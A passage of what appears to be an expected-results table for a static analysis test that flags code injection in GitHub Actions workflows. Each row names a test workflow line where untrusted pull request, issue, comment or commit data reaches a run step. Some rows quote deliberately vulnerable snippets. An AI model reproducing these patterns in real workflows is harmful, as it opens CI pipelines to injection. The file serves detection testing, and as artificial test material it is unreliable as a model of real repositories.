toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | -| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | -| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | .github/workflows/test5.yml | -| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | .github/workflows/test8.yml | -| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | .github/workflows/test8.yml | -| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | -| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | .github/workflows/test11.yml | -| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | .github/workflows/test12.yml | -| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | -| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | -| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | -| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | -| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | -| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | -| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | -| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | -| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | -| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | -| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | -| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | -| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | -| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | -| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | -| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | -| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | -| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | -| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | -| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | .github/workflows/test18.yml | -| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | -| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | .github/workflows/test.yml | -| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout1.yml | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | 